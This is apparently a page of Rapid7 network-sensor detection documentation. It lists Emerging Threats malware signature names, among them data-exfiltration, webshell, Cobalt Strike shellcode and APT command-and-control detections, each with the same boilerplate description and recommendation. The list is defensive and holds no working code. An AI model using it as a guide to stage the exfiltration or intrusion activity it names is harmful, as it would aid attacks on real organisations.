This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE SQUIRRELWAFFLE Server Response

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE SSL Cert Associated with Lazarus Downloader (JEUSD)

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE SSL/TLS Certificate Observed (APT32 METALJACK)

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE SSL/TLS Certificate Observed (APT32 METALJACK)

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE SSL/TLS Certificate Observed (APT32 METALJACK)

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE SSL/TLS Certificate Observed (APT32 METALJACK)

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE SSL/TLS Certificate Observed (Buer Loader)

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE SSL/TLS Certificate Observed (DiplomatLoader)

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE SSL/TLS Certificate Observed (Get2 CnC)

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE SSL/TLS Certificate Observed (Magecart)

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE SSL/TLS Certificate Observed (Maldoc CnC)

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE SSL/TLS Certificate Observed (StrongPity)

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE SSL/TLS Certificate Observed (StrongPity)

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE SSL/TLS Certificate Observed (StrongPity)

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE SSL/TLS Certificate Observed (StrongPity)

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE SSL/TLS Certificate Observed (StrongPity)

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE SSL/TLS Certificate Observed (StrongPity)

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE SSL/TLS Certificate Observed (StrongPity)

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE SSL/TLS Certificate Observed (StrongPity)

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE SSL/TLS Certificate Observed (Various Crimeware)

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE SSL/TLS Certificate Observed (WRAT)

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE SSV Agent CnC Activity

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Stabuniq Checkin

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE StartPage jsp checkin

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE StartPage Userclass HTTP Request

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Stealbit Variant Data Exfil M1

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Stealbit Variant Data Exfil M2

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE StealerNeko CnC Checkin

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE StealRat Checkin

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Steam Steal0r

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Steam Stealer

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE SteamStealer Domain in SNI

Description
Copy link

Recommendation
Copy link

ET MALWARE SteamStealer Malicious SSL Certificate Detected

Description
Copy link

Recommendation
Copy link

MITRE ATT&CK Techniques
Copy link

  • Develop Capabilities - T1587

ET MALWARE Steganographic Encoded WAV File Inbound via HTTP M1

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Steganographic Encoded WAV File Inbound via HTTP M2

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Stobox Connectivity Check

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Storm C&C with typo’d User-Agent (Windoss)

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE StormKitty Data Exfil via Telegram

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE StormKitty Exfil via AnonFiles

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE StrifeWater Rat CnC Activity

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE StrifeWater RAT CnC Activity M2

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE StrongPity APT SSL Certificate Detected

Description
Copy link

Recommendation
Copy link

ET MALWARE STRRAT Initial HTTP Activity

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE STRRAT Requesting License Check

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Stuxnet index.php

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Successful Cobalt Strike Shellcode Download (x32)

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Successful Cobalt Strike Shellcode Download (x64) M1

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Successful Cobalt Strike Shellcode Download (x64) M2

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE SunSeed Downloader Retrieving Binary (set)

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE SunSeed Download Retrieving Binary

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE SunSeed Lua Downloader Activity (GET)

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE SUNSHUTTLE CnC Activity

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Supercharge Component Download (exe)

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Supercharge Component Download (ps1)

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE SuperFish CnC Beacon 1

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

MITRE ATT&CK Techniques
Copy link

  • Exfiltration Over C2 Channel - T1041

ET MALWARE SuperFish CnC Beacon 2

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

MITRE ATT&CK Techniques
Copy link

  • Exfiltration Over C2 Channel - T1041

ET MALWARE SuperFish Possible SSL Cert Signed By Compromised Root CA

Description
Copy link

Recommendation
Copy link

ET MALWARE SuperSocialat Plugin Backdoor Code Execution Attempt

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE SupremeLogger CnC Checkin

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE SUR SSL Cert APT1

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Suspected APT15/NICKEL KETRUM CnC Activity (GET)

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Suspected APT32/OceanLotus Activity

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Suspected APT32/Oceanlotus Maldoc CnC

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Suspected APT LuckyMouse BlueTraveller CnC

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Suspected Ares Loader Activity (GET)

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Suspected Bizarro Banker Activity (POST)

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Suspected DonotGroup Dropper Activity

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Suspected DonotGroup Dropper Telegram API Activity

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Suspected Fancy Bear (APT28) Maldoc CnC

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Suspected Gamaredon Downloader Activity

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Suspected Glupteba Download

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Suspected Glupteba Download

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Suspected Gootkit Activity

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Suspected HARDPULSE Request

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Suspected Kimsuky Activity (GET)

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Suspected Lockscreen Ransomware Activity

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

MITRE ATT&CK Techniques
Copy link

  • Data Encrypted for Impact - T1486

ET MALWARE Suspected Malicious VBS Script Activity

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Suspected PlugX Checkin Activity (GET)

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Suspected Powershell Empire GET M1

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Suspected Powershell Empire POST M1

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Suspected Praying Mantis Threat Actor Activity

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Suspected PULSECHECK Webshell Access Inbound

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Suspected REDCURL CnC Activity M1

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Suspected REDCURL CnC Activity M2

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Suspected SandCat Related Communication (POST)

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Suspected Sidewinder Activity (GET)

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Suspected Sidewinder APT Maldoc Activity

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Suspected SmokeLoader Retrieving Next Stage (GET)

Description
Copy link

Recommendation
Copy link

ET MALWARE Suspected TeamTNT Linux Miner Activity

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Suspected Tunna Proxy M1

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Suspected Tunna Proxy M1 (Outbound)

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Suspected Tunna Proxy M2

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Suspected Tunna Proxy M2 (Outbound)

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Suspected Tunna Proxy M3

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Suspected Tunna Proxy M3 (Outbound)

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Suspected Tunna Proxy M4

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Suspected Tunna Proxy M4 (Outbound)

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Suspected USBFERRY CnC

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Suspected Win32/Hancitor Checkin

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Suspected Zebrocy Downloader Traffic

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Suspected Zebrocy Implant CnC Checkin

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Suspicious bot.exe Request

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Suspicious Domain (judgebryantweekes .com) in TLS SNI

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

MITRE ATT&CK Techniques
Copy link

  • Encrypted Channel - T1573

ET MALWARE Suspicious Domain (lawyeryouwant .com) in TLS SNI

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

MITRE ATT&CK Techniques
Copy link

  • Encrypted Channel - T1573

ET MALWARE Suspicious Download Setup_ exe

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Suspicious Fake Opera 10 User-Agent

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Suspicious flash_player.exe Download

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE SUSPICIOUS UA (iexplore)

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Suspicious UA Mozilla / 4.0

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Suspicious User-Agent (Asteria md5)

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Suspicious User-Agent build - possibly Delf/Troxen/Zema

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Suspicious user-agent (f**king)

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Suspicious User-Agent (GenericHttp/VER_STR_COMMA)

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Suspicious User-Agent MyAgrent

Description
Copy link

